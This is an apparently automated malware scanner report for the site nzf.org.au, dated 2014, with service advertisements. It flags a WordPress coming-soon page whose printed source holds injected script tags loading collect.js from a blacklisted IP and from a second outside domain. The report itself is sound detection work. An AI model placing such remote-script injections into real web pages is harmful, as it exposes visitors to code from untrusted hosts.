New scan:

Malware Scanner report for nzf.org.au

Malicious/Suspicious/Total urls checked
0/1/6
1 page has suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://nzf.org.au/
200 OK
Content-Length: 4136
Content-Type: text/html
suspicious
Page code contains blacklisted domain: 122.155.168.105

...[1665 bytes skipped]...
url('http://nzf.org.au/wp-content/plugins/ultimate-coming-soon-page/inc/template/images/bg.png') repeat;
}
#coming-soon-container{
font-family:"empty_0",sans-serif;
}

#coming-soon-container, #coming-soon-footer{
color:#000;
text-shadow: #fff 1px 1px 0px;
}
</style>
<script type="text/javascript" src="http://122.155.168.105/ads/inpage/pub/collect.js"></script><script language="javascript" src="http://www.clickevents.com.my/scripts/collect.js" type="text/javascript"></script></head>
<body id="coming-soon-page">
<div id="coming-soon-container">
<div id="coming-soon-main" role="main">
<div id="coming-soon">
<img id="teaser-image" src="http://nzf.org.au/wp-content/uploads/2013/06/NZF_Type_Austr
...[2412 bytes skipped]...

http://122.155.168.105/ads/inpage/pub/collect.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://122.155.168.105/test404page.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://www.clickevents.com.my/scripts/collect.js
200 OK
Content-Length: 2920
Content-Type: application/x-javascript
clean
http://nzf.org.au/wp-includes/js/jquery/jquery.js
200 OK
Content-Length: 93658
Content-Type: application/javascript
clean
http://nzf.org.au/wp-content/plugins/ultimate-coming-soon-page/inc/template/script.js
200 OK
Content-Length: 6248
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: nzf.org.au

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 14:43:03 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 4136
Content-Type: text/html
X-Powered-By: PHP/5.4.23

...4136 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: nzf.org.au
Referer: http://www.google.com/search?q=nzf.org.au

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=nzf.org.au

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://nzf.org.au/

Result: nzf.org.au is not infected or malware details are not published yet.